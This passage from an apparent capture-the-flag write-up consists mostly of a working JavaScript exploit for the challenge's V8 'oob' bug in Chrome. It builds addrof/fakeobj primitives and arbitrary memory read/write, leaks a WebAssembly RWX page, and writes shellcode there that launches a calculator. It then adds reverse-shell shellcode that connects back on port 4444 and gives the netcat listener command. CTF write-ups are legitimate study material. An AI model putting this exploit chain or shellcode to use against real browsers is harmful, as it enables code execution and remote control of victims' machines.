var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // placed desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write to address to backing store
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}

// wasm exploit
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

console.log("[+] WASM Instance at 0x" + (addrof(wasm_instance)).toString(16));

// leak RWX base
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc)
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

// shellcode time
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;
    initial_arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];

// pop it
console.log("[+] Copying Shellcode...");

copy_shellcode(rwx_base, shellcode);

console.log("[+] Running Shellcode...");

f();

Popping it on Chrome

Create an index.html with the following code:

<html>
  <head>
    <script src="exploit2.js"></script>
  </head>
</html>

Make sure exploit2.js is in the same folder. Then load the index.html with the version of Chrome bundled in the challenge:

$ ./chrome --no-sandbox ../../index.html

And it pops calculator! You can also place it in another folder and use python's SimpleHTTPServer to serve it and connect that way - it works either way.

Getting a Reverse Shell instead

Well, we are hackers, we like the idea of a reverse shell, no? Plus it makes you feel way cooler to be able to do that.

Grabbing the reverse shell code from here and modifying it slightly to change it to loopback to 127.0.0.1:

var shellcode = ['0x6a58296a', '0x016a5f02', '0x050f995e', '0x68525f50', '0x0100007f', '0x5c116866', '0x6a026a66', '0x5e54582a', '0x0f5a106a', '0x5e026a05', '0x0f58216a', '0xceff4805', '0x016af679', '0x50b94958', '0x77737361', '0x41203a64', '0x6a5e5451', '0x050f5a08', '0x48c03148', '0x0f08c683', '0x31b84805', '0x35343332', '0x56383736', '0x75af485f', '0x583b6a1a', '0xbb485299', '0x6e69622f', '0x68732f2f', '0x525f5453', '0x54575a54', '0x90050f5e']

Listening with nc -nvlp 4444, we get the prompt for a password, which is 12345678. Input that, and bingo! It even works on the Chrome instance!

Final Thoughts

First off, give Faith a follow, they deserve it.

Secondly, WASM makes no sense to me, but oh well. Sounds like a security nightmare.